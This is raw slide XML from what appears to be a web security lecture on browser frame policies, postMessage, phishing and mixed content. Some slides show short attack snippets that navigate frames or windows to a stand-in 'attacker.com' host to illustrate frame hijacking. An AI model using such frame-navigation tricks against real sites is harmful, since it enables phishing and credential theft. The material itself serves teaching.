            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>window.addEventListener("message", function (e) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>  if (e.origin == "http://a.com") {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>    ... e.data ... }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>}, false);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="10-Point Star 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="5362757"/>
            <a:ext cx="762000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="star10">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9900"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle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100">
                <a:solidFill>
                  <a:srgbClr val="172252"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Facebook</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="172252"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Anecdote</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39945" name="Picture 12" descr="a.com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4230871"/>
            <a:ext cx="2616200" cy="16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6" name="Picture 13" descr="b.com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64400" y="4230871"/>
            <a:ext cx="2616200" cy="16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9947" name="Straight Arrow Connector 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="5018271"/>
            <a:ext cx="2514600" cy="15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9948" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5395914" y="4618220"/>
            <a:ext cx="19954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Attack at dawn! </a:t>
            </a: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42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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="2149476"/>
            <a:ext cx="6019800" cy="517525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include “targetOrigin”?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3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What goes wrong?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buClr>
                <a:schemeClr val="hlink"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>	frames[0].postMessage("Attack at dawn!");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 eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Messages sent to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>frames</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>, not principals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>When would this happen?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4915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763000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EAD8062-BFDB-4E21-95A4-C8B019B16442}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="reply-attack-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4389438"/>
            <a:ext cx="2971800" cy="185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reply-attack-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4389438"/>
            <a:ext cx="2971800" cy="185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20034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Navigation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4096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40962" name="Rectangle 109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87630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721E4E98-6C54-4011-A044-49C2C5501BA0}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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93780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>
          <a:xfrm>
            <a:off x="2133600" y="304800"/>
            <a:ext cx="7772400" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Reported Web Vulnerabilities "In the Wild"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24579" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2349500" y="5943601"/>
            <a:ext cx="80899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>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data from aggregator and validator of  NVD-reported vulnerabilities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181100"/>
            <a:ext cx="823595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5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Guninski Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41988" name="Picture 3" descr="adsen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752600"/>
            <a:ext cx="6858000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7112000" y="4114800"/>
            <a:ext cx="2133600" cy="1536700"/>
            <a:chOff x="4656" y="1440"/>
            <a:chExt cx="864" cy="768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="41994" name="Picture 7" descr="transparent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56" y="1440"/>
              <a:ext cx="864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995" name="Rectangle 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4663" y="1440"/>
              <a:ext cx="844" cy="768"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="57150">
              <a:solidFill>
                <a:srgbClr val="66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>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1356809" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7581900" y="3748088"/>
            <a:ext cx="1187450" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699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Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>awglogin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 12" descr="MCj034912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620000" y="4114801"/>
            <a:ext cx="1646238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2514600" y="5029200"/>
            <a:ext cx="5638800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44227"/>
              <a:gd name="adj2" fmla="val 94699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1400" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>window.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("https://attacker.com/", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>awglogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 12" descr="MCj034912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1020762" y="4510087"/>
            <a:ext cx="1646238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31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6809" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="11" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="11" grpId="1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should the policy be?</a:t>
            </a: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763000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46005A46-79CA-40A0-B97E-2AB30C506EA8}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/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295401"/>
            <a:ext cx="6686550" cy="5057775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</p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43013" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2743201" y="2103439"/>
            <a:ext cx="6537325" cy="4205287"/>
          </a:xfrm>
          <a:prstGeom prst="rect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3014" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7315201" y="2895600"/>
            <a:ext cx="1819275" cy="3200400"/>
          </a:xfrm>
          <a:prstGeom prst="rect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3015" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2886075" y="2895600"/>
            <a:ext cx="2133600" cy="3200400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="0070C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3038475" y="4648200"/>
            <a:ext cx="1828800" cy="1295400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wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p: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5400000">
            <a:off x="3390900" y="4457700"/>
            <a:ext cx="1447800" cy="1524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 type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxn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>
            <a:off x="4724400" y="3657600"/>
            <a:ext cx="3429000" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln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4229100" y="3238500"/>
            <a:ext cx="2514600" cy="1828800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/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="3886200" y="3124200"/>
            <a:ext cx="2667000" cy="1905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429000" y="4038600"/>
            <a:ext cx="6575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Child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156326" y="3562350"/>
            <a:ext cx="8018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Sibling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273676" y="4324350"/>
            <a:ext cx="12966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Descendant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334000" y="3810000"/>
            <a:ext cx="12401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A9921"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Frame Bust</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18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22316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315" name="Group 187"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1981200" y="1600200"/>
          <a:ext cx="8229600" cy="466344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4905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Browser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Policy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IE 6 (default)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Permissive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IE 6 (option)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Child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IE7 (no Flash)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Descendant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IE7 (with Flash)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Permissive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Firefox 2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Window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Safari 3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Permissive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Opera 9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Window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-80" charset="-128"/>
                      </a:endParaRP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HTML 5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Child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4066" name="Picture 62" descr="safar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1375" y="47117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67" name="Picture 63" descr="i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3588" y="2066925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68" name="Picture 64" descr="firefo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2488" y="4210051"/>
            <a:ext cx="533400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69" name="Picture 65" descr="oper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89150" y="5268914"/>
            <a:ext cx="5334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70" name="Picture 70" descr="lo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89150" y="57150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71" name="Picture 71" descr="ie-6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89150" y="368935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07"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2024063" y="2557463"/>
            <a:ext cx="685800" cy="685800"/>
            <a:chOff x="192" y="1310"/>
            <a:chExt cx="480" cy="480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="44076" name="Picture 73" descr="i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2" y="1310"/>
              <a:ext cx="480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77" name="Picture 72" descr="do-not-enter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93" y="1605"/>
              <a:ext cx="96" cy="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4073" name="Picture 130" descr="ie-6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11375" y="3178175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74" name="Picture 20" descr="flashjava"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10" cstate="print"/>
          <a:srcRect r="52881"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2393950" y="3852863"/>
            <a:ext cx="349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75" name="Title 41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="3048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4400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Legacy Browser Behavior</a:t>
            </a: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0552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ko-KR" smtClean="0">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Window Policy Anomaly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46083" name="Picture 4" descr="igoogle-befo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1" y="1828801"/>
            <a:ext cx="5719763" cy="428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0" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="2493963"/>
            <a:ext cx="5638800" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44227"/>
              <a:gd name="adj2" fmla="val 94699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4568825" y="2600325"/>
            <a:ext cx="56515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latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>top.frames[1].location = "http://www.attacker.com/...";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>top.frames[2].location = "http://www.attacker.com/...";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>... </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="igoogle-aft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1" y="1828800"/>
            <a:ext cx="5724525" cy="428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9680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0" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="47110" grpId="1" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="47111" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="47111" grpId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315" name="Group 187"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1981200" y="1600200"/>
          <a:ext cx="8229600" cy="466344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4905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Browser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Policy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IE 6 (default)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Permissive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IE 6 (option)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Child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IE7 (no Flash)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Descendant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IE7 (with Flash)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Permissive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Firefox 2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Window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Safari 3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Permissive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Opera 9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Window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-80" charset="-128"/>
                      </a:endParaRP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HTML 5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Child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4066" name="Picture 62" descr="safar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1375" y="47117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67" name="Picture 63" descr="i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3588" y="2066925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68" name="Picture 64" descr="firefo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2488" y="4210051"/>
            <a:ext cx="533400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69" name="Picture 65" descr="oper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89150" y="5268914"/>
            <a:ext cx="5334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70" name="Picture 70" descr="lo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89150" y="57150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71" name="Picture 71" descr="ie-6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89150" y="368935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07"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2024063" y="2557463"/>
            <a:ext cx="685800" cy="685800"/>
            <a:chOff x="192" y="1310"/>
            <a:chExt cx="480" cy="480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="44076" name="Picture 73" descr="i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2" y="1310"/>
              <a:ext cx="480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77" name="Picture 72" descr="do-not-enter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93" y="1605"/>
              <a:ext cx="96" cy="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4073" name="Picture 130" descr="ie-6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11375" y="3178175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74" name="Picture 20" descr="flashjava"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10" cstate="print"/>
          <a:srcRect r="52881"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2393950" y="3852863"/>
            <a:ext cx="349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75" name="Title 41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="3048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4400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Legacy Browser Behavior</a:t>
            </a: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589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61" name="Group 41"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1981200" y="1600201"/>
          <a:ext cx="8229600" cy="3810003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5445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Browser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Policy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IE7 (no Flash)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Descendant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IE7 (with Flash)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Descendant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Firefox 3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Descendant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Safari 3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Descendant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Opera 9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(many policies)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-80" charset="-128"/>
                      </a:endParaRP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         HTML 5</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="109728" marR="109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-80" charset="-128"/>
                        </a:rPr>
                        <a:t>Descendant</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="109728" marR="109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8156" name="Picture 62" descr="safar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1375" y="38100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57" name="Picture 64" descr="firef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2488" y="3297238"/>
            <a:ext cx="533400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58" name="Picture 65" descr="oper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89150" y="4410076"/>
            <a:ext cx="5334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59" name="Picture 70" descr="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89150" y="4876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60" name="Picture 130" descr="ie-6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11375" y="2181225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2089150" y="2713038"/>
            <a:ext cx="654050" cy="544512"/>
            <a:chOff x="356" y="1652"/>
            <a:chExt cx="412" cy="343"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48163" name="Picture 71" descr="ie-6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6" y="1652"/>
              <a:ext cx="336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64" name="Picture 20" descr="flashjava"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:srcRect r="52881"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="548" y="1755"/>
              <a:ext cx="22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8162" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="3048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r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adoption of Descendant Policy</a:t>
            </a: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324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Security User Interface</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2150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When is it safe to type my password?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36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Safe to type your password?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22531" name="Content Placeholder 4" descr="bank-of-the-west-rea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82825" y="1524000"/>
            <a:ext cx="8001000" cy="4287838"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2253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763000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B19107E-E21C-473E-B065-BC573B971AEE}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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3886200" y="2133600"/>
            <a:ext cx="1524000" cy="3746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5638800" y="2133600"/>
            <a:ext cx="1447800" cy="3746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8229600" y="5257800"/>
            <a:ext cx="1676400" cy="3746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75725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Safe to type your password?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23555" name="Content Placeholder 4" descr="bank-of-the-west-phis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82825" y="1527175"/>
            <a:ext cx="8001000" cy="4287838"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2355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763000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392A480F-211A-4759-A98D-636A288BC7C9}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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495800" y="2133600"/>
            <a:ext cx="838200" cy="3746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7285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Safe to type your password?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24579" name="Content Placeholder 4" descr="bank-of-the-west-tricky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82825" y="1527175"/>
            <a:ext cx="8001000" cy="4287838"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2458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763000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DBDD556-A598-42BD-A218-133BD66078AA}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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495800" y="2133600"/>
            <a:ext cx="1524000" cy="3746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696200" y="4343400"/>
            <a:ext cx="2057400" cy="10604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962400" y="2133600"/>
            <a:ext cx="381000" cy="3746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9" name="Picture 8" descr="vest-up-clos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1163" y="2705100"/>
            <a:ext cx="8829675" cy="3238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0136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http://securityintelligence.com/wp-content/uploads/2013/09/Figure-6-Web-Application-Vulnerabilities-by-Attack-Technique-2009-2013-H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6" y="299826"/>
            <a:ext cx="8348664" cy="598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36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Safe to type your password?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25603" name="Content Placeholder 4" descr="bank-of-the-west-sketchy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82825" y="1527175"/>
            <a:ext cx="8001000" cy="4287838"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2560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763000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2577E676-3ED8-45D6-BA6D-3F84037411F9}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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495800" y="2133600"/>
            <a:ext cx="1828800" cy="3746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959350" y="1371601"/>
            <a:ext cx="10604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8077200" y="5257800"/>
            <a:ext cx="1828800" cy="3746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8534400" y="5486401"/>
            <a:ext cx="10604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11782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838200" y="2821"/>
            <a:ext cx="10515600" cy="906463"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Safe to type your password?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26627" name="Content Placeholder 4" descr="bank-of-the-west-pip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514600" y="826701"/>
            <a:ext cx="7105650" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2662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763000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0A96D87A-10C6-4B2F-B5DB-DBA046A0F0DF}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0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5410200" y="2396739"/>
            <a:ext cx="1371600" cy="2286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4084638" y="2396739"/>
            <a:ext cx="1371600" cy="2286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7604125" y="4892289"/>
            <a:ext cx="1371600" cy="2286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4084638" y="1741101"/>
            <a:ext cx="4144962" cy="3810000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="127000" cap="rnd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 flipH="1">
            <a:off x="4084638" y="1741101"/>
            <a:ext cx="4144962" cy="3810000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="127000" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxn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3810000" y="1336289"/>
            <a:ext cx="1371600" cy="2286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79329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Mixed Content:  HTTP and HTTPS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14592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Page loads over HTTPS, but has HTTP content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network attacker can control page </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IE:   displays mixed-content dialog to user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
